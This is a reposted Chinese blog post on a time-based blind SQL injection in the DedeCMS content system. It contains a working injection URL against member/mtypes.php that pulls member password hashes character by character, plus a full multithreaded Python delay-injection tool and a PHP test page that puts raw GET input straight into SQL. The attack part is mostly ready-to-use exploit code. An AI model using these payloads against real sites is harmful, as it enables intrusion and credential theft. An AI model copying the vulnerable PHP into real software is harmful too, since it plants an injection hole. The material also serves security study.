码迷,mamicode.com
首页 > 其他好文 > 详细

最新织梦的一个延时注入

时间:2015-12-26 22:12:29      阅读:306      评论:0      收藏:0      [点我收藏+]

标签:

localhost/data/admin/ver.txt
查看补丁

member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a‘ and `‘`.``.mtypeid or if(ascii (substr((select pwd from dede_member limit 1),1,1))%3d50,1,0) and mtypeid%3d1%23]=名字&_FILES[mtypename][size]=.xxxx

织梦的默认可以K掉注入。。所以必须要手工试着枚举可能 所有英文字母、、
对照下ascll码表~

如果有跟我一样懒得话 参照lcy影牛写的一个py脚本 php跑延迟注入

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2015-08-29 22:26:17
# @Last Modified by:   Lcy
# @Last Modified time: 2015-08-30 01:37:01
# blog:https://phpinfo.me
# 延迟注入工具
import urllib2
import time
import socket
import threading
import requests

class my_threading(threading.Thread):
                def __init__(self, str,x):
                                threading.Thread.__init__(self)
                                self.str = str
                                self.x = x
                def run(self):
                        global res
                        x=self.x
                        j = self.str
                        url = "http://localhost/demo/1.php?username=root‘+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23"
                        html = request(url) 
                        verify = ‘timeout‘ 
                        if verify not in html: 
                                res[str(j)] = 0
                                #print 1
                        else:
                                res[str(j)] = 1
        

def request(URL): 
        user_agent = { ‘User-Agent‘ : ‘Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10‘ } 
        req = urllib2.Request(URL, None, user_agent)  
        try: 
                request = urllib2.urlopen(req,timeout=2) 
        except Exception ,e: 
                time.sleep(2)
                return ‘timeout‘ 
        return request.read()         

def curl(url):
        try:
                        start = time.clock()
                        requests.get(url)
                        end = time.clock()
                        return int(end)
        except requests.RequestException as e:
                        print u"访问出错!"
                        exit()
def getLength():
        i = 0
        while True:
                print "[+] Checking: %s \r" %i
                url = "http://localhost/demo/1.php?username=root‘+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
                timeout = curl(url)
                if timeout >= 1:
                        print u"[+] 数据长度为: %s" %i
                        return i
                i = i + 1
def bin2dec(string_num):
        return int(string_num, 2)

def getData(dataLength):
        global res
        data = ""
        for x in range(dataLength):
                x = x + 1
                #print x
                threads = []
                for j in range(8):
                        result = ""
                        j = j + 1
                        sb = my_threading(j,x)
                        sb.setDaemon(True)
                        threads.append(sb)
                        #print j
                for t in threads:
                                t.start()
                for t in threads:
                                t.join()
                #print res
                tmp = ""
                for i in range(8):
                        tmp = tmp + str(res[str(i+1)])
                #print chr(bin2dec(tmp))
                res = {}
                result = chr(bin2dec(tmp))
                print result
                data = data + result
                sb = None
        print "[+] ok!"
        print "[+] result:" + data


if __name__ == ‘__main__‘:
        stop = False
        res = {}
        length = getLength()
            getData(length)
<?php
/* 
* @Author: Lcy
* @Date:   2015-08-29 22:09:59
* @Last Modified by:   Lcy
* @Last Modified time: 2015-08-30 00:34:31
* 延迟注入测试
*/
header("Content-type:text/html;charset=utf8");
$link = mysql_connect("localhost", "root","");
mysql_select_db("mysql", $link);
mysql_set_charset("utf8");
$sql = "SELECT user FROM user where user=‘{$_GET[‘username‘]}‘";
echo $sql;
$query = mysql_query($sql);
echo "这是一个没有任何回显的注入点";

?>
转自:http://www.silic.top/index.php/archives/7/

最新织梦的一个延时注入

标签:

原文地址:http://www.cnblogs.com/dongchi/p/5079138.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!